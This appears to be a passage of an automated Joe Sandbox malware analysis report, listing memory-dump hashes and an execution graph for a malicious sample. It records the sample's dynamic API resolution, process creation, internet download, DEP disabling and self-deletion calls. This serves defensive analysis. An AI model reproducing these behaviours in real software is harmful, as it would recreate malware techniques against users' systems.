                                                        • API String ID: 0-475278312
                                                        • Opcode ID: 7949bebc07f96cbb9fb576de528cc7fe4199a2c99f2094f74bb230d4153372fe
                                                        • Instruction ID: 9260235cc6bfd07571e8d3c272e3a18562d97bb3a20dba595012004b998d0066
                                                        • Opcode Fuzzy Hash: 7949bebc07f96cbb9fb576de528cc7fe4199a2c99f2094f74bb230d4153372fe
                                                        • Instruction Fuzzy Hash: E85122317042019BCB24AB6D89507BBFBEAEFC5320F68887AD945DB251DB71DC41C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L4p$L4p$L4p$d.,$d.,
                                                        • API String ID: 0-1661813829
                                                        • Opcode ID: baedd46745f780427e4b43287e1fdc2f7c137fdfcde23ee0e192c04e0e266d95
                                                        • Instruction ID: a172e66398ec3c5587c3d6cc4353d2d9368a2679f1a997abc495914ea21cc1e1
                                                        • Opcode Fuzzy Hash: baedd46745f780427e4b43287e1fdc2f7c137fdfcde23ee0e192c04e0e266d95
                                                        • Instruction Fuzzy Hash: E7513535700244EBCF159F28C954BFE7BA6EF84320F148426E9158F291CBB4DD41DB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L4p$L4p$L4p$L:4$L:4
                                                        • API String ID: 0-1544877867
                                                        • Opcode ID: 0b72b5542c5695b04405cd3353a1973594c0694603dd65a15115cf1a3f0f422f
                                                        • Instruction ID: 272fe92f2c189176ec453a931a7ce1624dea9eb93eee056e298e9ee10dff6ef4
                                                        • Opcode Fuzzy Hash: 0b72b5542c5695b04405cd3353a1973594c0694603dd65a15115cf1a3f0f422f
                                                        • Instruction Fuzzy Hash: D741F234A01248EFDB248E64C6447FF7BABAFC4320F188065E9059B2A1E7B4DD85CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $;4$L4p$L4p$L4p
                                                        • API String ID: 0-3081791480
                                                        • Opcode ID: b0d8124febaacc5e9d36a2fafc7fa02040bc048cc7660dc8da22955973b607e6
                                                        • Instruction ID: 22f47bba80ea163c16ba57fc3cff13d4d01c552e3871e792312c0258721ed8c1
                                                        • Opcode Fuzzy Hash: b0d8124febaacc5e9d36a2fafc7fa02040bc048cc7660dc8da22955973b607e6
                                                        • Instruction Fuzzy Hash: 1E611534B00204EFEB159E68C9547FF7FA6AFC4320F148466E9059B292DB71DE45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$4'p$$p$$p
                                                        • API String ID: 0-377911355
                                                        • Opcode ID: e521cba35607d2c76f4d54dcafbbebe3a1452aa5a1285dfd4f5a0e5598e66c7b
                                                        • Instruction ID: a75116d85ba8a67972c9eb39771a48c4d494721817c2c285db240e97a3ea3dca
                                                        • Opcode Fuzzy Hash: e521cba35607d2c76f4d54dcafbbebe3a1452aa5a1285dfd4f5a0e5598e66c7b
                                                        • Instruction Fuzzy Hash: 5501D6257093C01FD32A02381C616EAEFA65FC2760B6D81EBD081CF257CD589C47C792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                         Execution Coverage: 4.9%
                                                         Dynamic/Decrypted Code Coverage: 0%
                                                         Signature Coverage: 4%
                                                         Total number of Nodes: 1636
                                                         Total number of Limit Nodes: 56
                                                        execution_graph 47242 445847 47243 445852 47242->47243 47245 44587b 47243->47245 47247 445877 47243->47247 47248 448a84 47243->47248 47255 44589f DeleteCriticalSection 47245->47255 47256 4484ca 47248->47256 47251 448ac9 InitializeCriticalSectionAndSpinCount 47254 448ab4 47251->47254 47253 448ae0 47253->47243 47263 434fcb 47254->47263 47255->47247 47257 4484f6 47256->47257 47258 4484fa 47256->47258 47257->47258 47262 44851a 47257->47262 47270 448566 47257->47270 47258->47251 47258->47254 47260 448526 GetProcAddress 47261 448536 __crt_fast_encode_pointer 47260->47261 47261->47258 47262->47258 47262->47260 47264 434fd6 IsProcessorFeaturePresent 47263->47264 47265 434fd4 47263->47265 47267 435018 47264->47267 47265->47253 47277 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47267->47277 47269 4350fb 47269->47253 47271 448587 LoadLibraryExW 47270->47271 47272 44857c 47270->47272 47273 4485a4 GetLastError 47271->47273 47274 4485bc 47271->47274 47272->47257 47273->47274 47276 4485af LoadLibraryExW 47273->47276 47274->47272 47275 4485d3 FreeLibrary 47274->47275 47275->47272 47276->47274 47277->47269 47278 434887 47279 434893 ___scrt_is_nonwritable_in_current_image 47278->47279 47305 434596 47279->47305 47281 43489a 47283 4348c3 47281->47283 47611 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47281->47611 47290 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47283->47290 47316 444251 47283->47316 47287 4348e2 ___scrt_is_nonwritable_in_current_image 47288 434962 47324 434b14 47288->47324 47290->47288 47612 4433e7 36 API calls 5 library calls 47290->47612 47298 434984 47299 43498e 47298->47299 47614 44341f 28 API calls _Atexit 47298->47614 47301 434997 47299->47301 47615 4433c2 28 API calls _Atexit 47299->47615 47616 43470d 13 API calls 2 library calls 
47301->47616 47304 43499f 47304->47287 47306 43459f 47305->47306 47617 434c52 IsProcessorFeaturePresent 47306->47617 47308 4345ab 47618 438f31 47308->47618 47310 4345b0 47315 4345b4 47310->47315 47627 4440bf 47310->47627 47313 4345cb 47313->47281 47315->47281 47317 444268 47316->47317 47318 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47317->47318 47319 4348dc 47318->47319 47319->47287 47320 4441f5 47319->47320 47323 444224 47320->47323 47321 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47322 44424d 47321->47322 47322->47290 47323->47321 47677 436e90 47324->47677 47327 434968 47328 4441a2 47327->47328 47679 44f059 47328->47679 47330 434971 47333 40e9c5 47330->47333 47331 4441ab 47331->47330 47683 446815 36 API calls 47331->47683 47854 41cb50 LoadLibraryA GetProcAddress 47333->47854 47335 40e9e1 GetModuleFileNameW 47859 40f3c3 47335->47859 47337 40e9fd 47874 4020f6 47337->47874 47340 4020f6 28 API calls 47341 40ea1b 47340->47341 47880 41be1b 47341->47880 47345 40ea2d 47906 401e8d 47345->47906 47347 40ea36 47348 40ea93 47347->47348 47349 40ea49 47347->47349 47912 401e65 47348->47912 48181 40fbb3 118 API calls 47349->48181 47352 40eaa3 47356 401e65 22 API calls 47352->47356 47353 40ea5b 47354 401e65 22 API calls 47353->47354 47355 40ea67 47354->47355 48182 410f37 36 API calls __EH_prolog 47355->48182 47357 40eac2 47356->47357 47917 40531e 47357->47917 47360 40ea79 48183 40fb64 78 API calls 47360->48183 47361 40ead1 47922 406383 47361->47922 47365 40ea82 48184 40f3b0 71 API calls 47365->48184 47371 401fd8 11 API calls 47373 40eefb 47371->47373 47372 401fd8 11 API calls 47374 40eafb 47372->47374 47613 4432f6 GetModuleHandleW 47373->47613 47375 401e65 22 API calls 47374->47375 47376 40eb04 47375->47376 47939 401fc0 47376->47939 47378 40eb0f 47379 401e65 22 API calls 47378->47379 47380 40eb28 47379->47380 47381 401e65 22 API calls 47380->47381 47382 40eb43 47381->47382 47383 40ebae 47382->47383 48185 406c1e 47382->48185 47384 401e65 22 
API calls 47383->47384 47390 40ebbb 47384->47390 47386 40eb70 47387 401fe2 28 API calls 47386->47387 47388 40eb7c 47387->47388 47391 401fd8 11 API calls 47388->47391 47389 40ec02 47943 40d069 47389->47943 47390->47389 47396 413549 3 API calls 47390->47396 47393 40eb85 47391->47393 48190 413549 RegOpenKeyExA 47393->48190 47394 40ec08 47395 40ea8b 47394->47395 47946 41b2c3 47394->47946 47395->47371 47402 40ebe6 47396->47402 47400 40f34f 48273 4139a9 30 API calls 47400->48273 47401 40ec23 47403 40ec76 47401->47403 47963 407716 47401->47963 47402->47389 48193 4139a9 30 API calls 47402->48193 47406 401e65 22 API calls 47403->47406 47408 40ec7f 47406->47408 47417 40ec90 47408->47417 47418 40ec8b 47408->47418 47410 40f365 48274 412475 65 API calls ___scrt_get_show_window_mode 47410->48274 47411 40ec42 48194 407738 30 API calls 47411->48194 47412 40ec4c 47415 401e65 22 API calls 47412->47415 47427 40ec55 47415->47427 47416 40f36f 47420 41bc5e 28 API calls 47416->47420 47423 401e65 22 API calls 47417->47423 48197 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47418->48197 47419 40ec47 48195 407260 98 API calls 47419->48195 47424 40f37f 47420->47424 47425 40ec99 47423->47425 48073 413a23 RegOpenKeyExW 47424->48073 47967 41bc5e 47425->47967 47427->47403 47431 40ec71 47427->47431 47428 40eca4 47971 401f13 47428->47971 48196 407260 98 API calls 47431->48196 47435 401f09 11 API calls 47437 40f39c 47435->47437 47438 401f09 11 API calls 47437->47438 47440 40f3a5 47438->47440 48076 40dd42 47440->48076 47441 401e65 22 API calls 47443 40ecc1 47441->47443 47446 401e65 22 API calls 47443->47446 47448 40ecdb 47446->47448 47447 40f3af 47449 401e65 22 API calls 47448->47449 47450 40ecf5 47449->47450 47451 401e65 22 API calls 47450->47451 47452 40ed0e 47451->47452 47454 401e65 22 API calls 47452->47454 47484 40ed7b 47452->47484 47453 40ed8a 47455 40ed93 47453->47455 47483 40ee0f ___scrt_get_show_window_mode 47453->47483 47458 40ed23 _wcslen 47454->47458 47456 
401e65 22 API calls 47455->47456 47457 40ed9c 47456->47457 47459 401e65 22 API calls 47457->47459 47461 401e65 22 API calls 47458->47461 47458->47484 47462 40edae 47459->47462 47460 40ef06 ___scrt_get_show_window_mode 48258 4136f8 RegOpenKeyExA 47460->48258 47464 40ed3e 47461->47464 47465 401e65 22 API calls 47462->47465 47468 401e65 22 API calls 47464->47468 47466 40edc0 47465->47466 47470 401e65 22 API calls 47466->47470 47467 40ef51 47471 401e65 22 API calls 47467->47471 47469 40ed53 47468->47469 48198 40da34 47469->48198 47472 40ede9 47470->47472 47473 40ef76 47471->47473 47478 401e65 22 API calls 47472->47478 47993 402093 47473->47993 47476 401f13 28 API calls 47477 40ed72 47476->47477 47480 401f09 11 API calls 47477->47480 47481 40edfa 47478->47481 47480->47484 48256 40cdf9 45 API calls _wcslen 47481->48256 47482 40ef88 47999 41376f RegCreateKeyA 47482->47999 47983 413947 47483->47983 47484->47453 47484->47460 47489 40eea3 ctype 47493 401e65 22 API calls 47489->47493 47490 40ee0a 47490->47483 47491 401e65 22 API calls 47492 40efaa 47491->47492 48005 43baac 47492->48005 47494 40eeba 47493->47494 47494->47467 47498 40eece 47494->47498 47497 40efc1 48261 41cd9b 87 API calls ___scrt_get_show_window_mode 47497->48261 47500 401e65 22 API calls 47498->47500 47499 40efe4 47505 402093 28 API calls 47499->47505 47502 40eed7 47500->47502 47503 41bc5e 28 API calls 47502->47503 47507 40eee3 47503->47507 47504 40efc8 CreateThread 47504->47499 49224 41d45d 10 API calls 47504->49224 47506 40eff9 47505->47506 47508 402093 28 API calls 47506->47508 48257 40f474 104 API calls 47507->48257 47510 40f008 47508->47510 48009 41b4ef 47510->48009 47511 40eee8 47511->47467 47513 40eeef 47511->47513 47513->47395 47515 401e65 22 API calls 47516 40f019 47515->47516 47517 401e65 22 API calls 47516->47517 47518 40f02b 47517->47518 47519 401e65 22 API calls 47518->47519 47520 40f04b 47519->47520 47521 43baac _strftime 40 API calls 47520->47521 47522 40f058 47521->47522 47523 401e65 22 API 
calls 47522->47523 47524 40f063 47523->47524 47525 401e65 22 API calls 47524->47525 47526 40f074 47525->47526 47527 401e65 22 API calls 47526->47527 47528 40f089 47527->47528 47529 401e65 22 API calls 47528->47529 47530 40f09a 47529->47530 47531 40f0a1 StrToIntA 47530->47531 48033 409de4 47531->48033 47534 401e65 22 API calls 47535 40f0bc 47534->47535 47536 40f101 47535->47536 47537 40f0c8 47535->47537 47539 401e65 22 API calls 47536->47539 48262 4344ea 47537->48262 47541 40f111 47539->47541 47544 40f159 47541->47544 47545 40f11d 47541->47545 47542 401e65 22 API calls 47543 40f0e4 47542->47543 47546 40f0eb CreateThread 47543->47546 47548 401e65 22 API calls 47544->47548 47547 4344ea new 22 API calls 47545->47547 47546->47536 49227 419fb4 103 API calls 2 library calls 47546->49227 47549 40f126 47547->47549 47550 40f162 47548->47550 47551 401e65 22 API calls 47549->47551 47553 40f1cc 47550->47553 47554 40f16e 47550->47554 47552 40f138 47551->47552 47557 40f13f CreateThread 47552->47557 47555 401e65 22 API calls 47553->47555 47556 401e65 22 API calls 47554->47556 47558 40f1d5 47555->47558 47559 40f17e 47556->47559 47557->47544 49226 419fb4 103 API calls 2 library calls 47557->49226 47560 40f1e1 47558->47560 47561 40f21a 47558->47561 47562 401e65 22 API calls 47559->47562 47564 401e65 22 API calls 47560->47564 48058 41b60d 47561->48058 47565 40f193 47562->47565 47567 40f1ea 47564->47567 48269 40d9e8 31 API calls 47565->48269 47572 401e65 22 API calls 47567->47572 47568 401f13 28 API calls 47569 40f22e 47568->47569 47571 401f09 11 API calls 47569->47571 47574 40f237 47571->47574 47575 40f1ff 47572->47575 47573 40f1a6 47576 401f13 28 API calls 47573->47576 47577 40f240 SetProcessDEPPolicy 47574->47577 47578 40f243 CreateThread 47574->47578 47586 43baac _strftime 40 API calls 47575->47586 47579 40f1b2 47576->47579 47577->47578 47580 40f264 47578->47580 47581 40f258 CreateThread 47578->47581 49197 40f7a7 47578->49197 47582 401f09 11 API calls 47579->47582 47584 40f279 
47580->47584 47585 40f26d CreateThread 47580->47585 47581->47580 49228 4120f7 138 API calls 47581->49228 47583 40f1bb CreateThread 47582->47583 47583->47553 49229 401be9 50 API calls _strftime 47583->49229 47588 40f2cc 47584->47588 47590 402093 28 API calls 47584->47590 47585->47584 49225 4126db 38 API calls ___scrt_get_show_window_mode 47585->49225 47587 40f20c 47586->47587 48270 40c162 7 API calls 47587->48270 48070 4134ff RegOpenKeyExA 47588->48070 47591 40f29c 47590->47591 48271 4052fd 28 API calls 47591->48271 47596 40f2ed 47598 41bc5e 28 API calls 47596->47598 47600 40f2fd 47598->47600 48272 41361b 31 API calls 47600->48272 47605 40f313 47606 401f09 11 API calls 47605->47606 47609 40f31e 47606->47609 47607 40f346 DeleteFileW 47608 40f34d 47607->47608 47607->47609 47608->47416 47609->47416 47609->47607 47610 40f334 Sleep 47609->47610 47610->47609 47611->47281 47612->47288 47613->47298 47614->47299 47615->47301 47616->47304 47617->47308 47619 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47618->47619 47631 43a43a 47619->47631 47623 438f4c 47624 438f57 47623->47624 47645 43a476 DeleteCriticalSection 47623->47645 47624->47310 47626 438f44 47626->47310 47673 44fb68 47627->47673 47630 438f5a 8 API calls 3 library calls 47630->47315 47632 43a443 47631->47632 47634 43a46c 47632->47634 47635 438f40 47632->47635 47646 438e7f 47632->47646 47651 43a476 DeleteCriticalSection 47634->47651 47635->47626 47637 43a3ec 47635->47637 47666 438d94 47637->47666 47639 43a3f6 47640 43a401 47639->47640 47671 438e42 6 API calls try_get_function 47639->47671 47640->47623 47642 43a40f 47643 43a41c 47642->47643 47672 43a41f 6 API calls ___vcrt_FlsFree 47642->47672 47643->47623 47645->47626 47652 438c73 47646->47652 47649 438eb6 InitializeCriticalSectionAndSpinCount 47650 438ea2 47649->47650 47650->47632 47651->47635 47653 438ca3 47652->47653 47654 438ca7 47652->47654 47653->47654 47658 438cc7 47653->47658 47659 438d13 47653->47659 47654->47649 
401fd8 11 API calls 49149->49150 49151 415c4d 49150->49151 49152 401fd8 11 API calls 49151->49152 49153 415c59 49152->49153 49154 401fd8 11 API calls 49153->49154 49155 415c65 49154->49155 49156 401fd8 11 API calls 49155->49156 49157 415c71 49156->49157 49158 401fd8 11 API calls 49157->49158 49159 415c7d 49158->49159 49160 401f09 11 API calls 49159->49160 49161 415c86 49160->49161 49162 401fd8 11 API calls 49161->49162 49163 415c8f 49162->49163 49164 401fd8 11 API calls 49163->49164 49165 415c98 49164->49165 49166 401e65 22 API calls 49165->49166 49167 415ca3 49166->49167 49168 43baac _strftime 40 API calls 49167->49168 49169 415cb0 49168->49169 49170 415cb5 49169->49170 49171 415cdb 49169->49171 49173 415cc3 49170->49173 49174 415cce 49170->49174 49172 401e65 22 API calls 49171->49172 49172->49178 49185 404ff4 82 API calls 49173->49185 49176 404f51 105 API calls 49174->49176 49177 415cc9 49176->49177 49177->49112 49178->49112 49186 4050e4 84 API calls 49178->49186 49179->49131 49180->49135 49181->49137 49182->49141 49183->49145 49184->49147 49185->49177 49186->49177 49188->48209 49189->48234 49190->48233 49191->48223 49192->48227 49193->48235 49194->48266 49199 40f7c2 49197->49199 49198 413549 3 API calls 49198->49199 49199->49198 49200 40f866 49199->49200 49203 40f856 Sleep 49199->49203 49219 40f7f4 49199->49219 49202 40905c 28 API calls 49200->49202 49201 40905c 28 API calls 49201->49219 49205 40f871 49202->49205 49203->49199 49204 41bc5e 28 API calls 49204->49219 49207 41bc5e 28 API calls 49205->49207 49208 40f87d 49207->49208 49232 413814 14 API calls 49208->49232 49211 401f09 11 API calls 49211->49219 49212 40f890 49213 401f09 11 API calls 49212->49213 49215 40f89c 49213->49215 49214 402093 28 API calls 49214->49219 49216 402093 28 API calls 49215->49216 49217 40f8ad 49216->49217 49220 41376f 14 API calls 49217->49220 49218 41376f 14 API calls 49218->49219 49219->49201 49219->49203 49219->49204 49219->49211 49219->49214 49219->49218 49230 40d096 112 API calls 
___scrt_get_show_window_mode 49219->49230 49231 413814 14 API calls 49219->49231 49221 40f8c0 49220->49221 49233 412850 TerminateProcess WaitForSingleObject 49221->49233 49223 40f8c8 ExitProcess 49234 4127ee 62 API calls 49228->49234 49231->49219 49232->49212 49233->49223 49235 4269e6 49236 4269fb 49235->49236 49248 426a8d 49235->49248 49237 426a48 49236->49237 49238 426b44 49236->49238 49239 426abd 49236->49239 49240 426b1d 49236->49240 49243 426af2 49236->49243 49246 426a7d 49236->49246 49236->49248 49263 424edd 49 API calls _Yarn 49236->49263 49237->49246 49237->49248 49264 41fb6c 52 API calls 49237->49264 49238->49248 49268 426155 28 API calls 49238->49268 49239->49243 49239->49248 49266 41fb6c 52 API calls 49239->49266 49240->49238 49240->49248 49251 425ae1 49240->49251 49243->49240 49267 4256f0 21 API calls 49243->49267 49246->49239 49246->49248 49265 424edd 49 API calls _Yarn 49246->49265 49252 425b00 ___scrt_get_show_window_mode 49251->49252 49254 425b0f 49252->49254 49257 425b34 49252->49257 49269 41ebbb 21 API calls 49252->49269 49254->49257 49262 425b14 49254->49262 49270 4205d8 46 API calls 49254->49270 49257->49238 49258 425b1d 49258->49257 49273 424d05 21 API calls 2 library calls 49258->49273 49260 425bb7 49260->49257 49271 432ec4 21 API calls new 49260->49271 49262->49257 49262->49258 49272 41da5f 49 API calls 49262->49272 49263->49237 49264->49237 49265->49239 49266->49239 49267->49240 49268->49248 49269->49254 49270->49260 49271->49262 49272->49258 49273->49257 49274 434875 49279 434b47 SetUnhandledExceptionFilter 49274->49279 49276 43487a pre_c_initialization 49280 44554b 20 API calls 2 library calls 49276->49280 49278 434885 49279->49276 49280->49278 49281 415d06 49296 41b380 49281->49296 49283 415d0f 49284 4020f6 28 API calls 49283->49284 49285 415d1e 49284->49285 49307 404aa1 61 API calls _Yarn 49285->49307 49287 415d2a 49288 417089 49287->49288 49289 401fd8 11 API calls 49287->49289 49290 401e8d 11 API calls 49288->49290 49289->49288 49291 
417092 49290->49291 49292 401fd8 11 API calls 49291->49292 49293 41709e 49292->49293 49294 401fd8 11 API calls 49293->49294 49295 4170aa 49294->49295 49297 4020df 11 API calls 49296->49297 49298 41b38e 49297->49298 49299 43bd51 new 21 API calls 49298->49299 49300 41b39e InternetOpenW InternetOpenUrlW 49299->49300 49301 41b3c5 InternetReadFile 49300->49301 49305 41b3e8 49301->49305 49302 4020b7 28 API calls 49302->49305 49303 41b415 InternetCloseHandle InternetCloseHandle 49304 41b427 49303->49304 49304->49283 49305->49301 49305->49302 49305->49303 49306 401fd8 11 API calls 49305->49306 49306->49305 49307->49287 49308 426c4b 49313 426cc8 send 49308->49313 49314 44831e 49322 448710 49314->49322 49317 448332 49319 44833a 49320 448347 49319->49320 49330 44834a 11 API calls 49319->49330 49323 4484ca _Atexit 5 API calls 49322->49323 49324 448737 49323->49324 49325 44874f TlsAlloc 49324->49325 49326 448740 49324->49326 49325->49326 49327 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 49326->49327 49328 448328 49327->49328 49328->49317 49329 448299 20 API calls 3 library calls 49328->49329 49329->49319 49330->49317 49331 43be58 49334 43be64 _swprintf ___scrt_is_nonwritable_in_current_image 49331->49334 49332 43be72 49347 4405dd 20 API calls _Atexit 49332->49347 49334->49332 49335 43be9c 49334->49335 49342 445888 EnterCriticalSection 49335->49342 49337 43be77 ___scrt_is_nonwritable_in_current_image _Atexit 49338 43bea7 49343 43bf48 49338->49343 49342->49338 49344 43bf56 49343->49344 49346 43beb2 49344->49346 49349 44976c 37 API calls 2 library calls 49344->49349 49348 43becf LeaveCriticalSection std::_Lockit::~_Lockit 49346->49348 49347->49337 49348->49337 49349->49344 49350 41dfbd 49351 41dfd2 _Yarn ___scrt_get_show_window_mode 49350->49351 49363 41e1d5 49351->49363 49369 432ec4 21 API calls new 49351->49369 49354 41e1e6 49357 41e189 49354->49357 49365 432ec4 21 API calls new 49354->49365 49356 41e182 ___scrt_get_show_window_mode 49356->49357 49370 432ec4 21 
API calls new 49356->49370 49359 41e21f ___scrt_get_show_window_mode 49359->49357 49366 43354a 49359->49366 49361 41e1af ___scrt_get_show_window_mode 49361->49357 49371 432ec4 21 API calls new 49361->49371 49363->49357 49364 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 49363->49364 49364->49354 49365->49359 49372 433469 49366->49372 49368 433552 49368->49357 49369->49356 49370->49361 49371->49363 49373 433482 49372->49373 49374 433478 49372->49374 49373->49374 49378 432ec4 21 API calls new 49373->49378 49374->49368 49376 4334a3 49376->49374 49379 433837 CryptAcquireContextA 49376->49379 49378->49376 49380 433858 CryptGenRandom 49379->49380 49381 433853 49379->49381 49380->49381 49382 43386d CryptReleaseContext 49380->49382 49381->49374 49382->49381 49383 40165e 49384 401666 49383->49384 49386 401669 49383->49386 49385 4016a8 49387 4344ea new 22 API calls 49385->49387 49386->49385 49388 401696 49386->49388 49389 40169c 49387->49389 49390 4344ea new 22 API calls 49388->49390 49390->49389 49391 426bdc 49397 426cb1 recv 49391->49397

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                        • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                        • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                        • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                        • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                        • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad$HandleModule
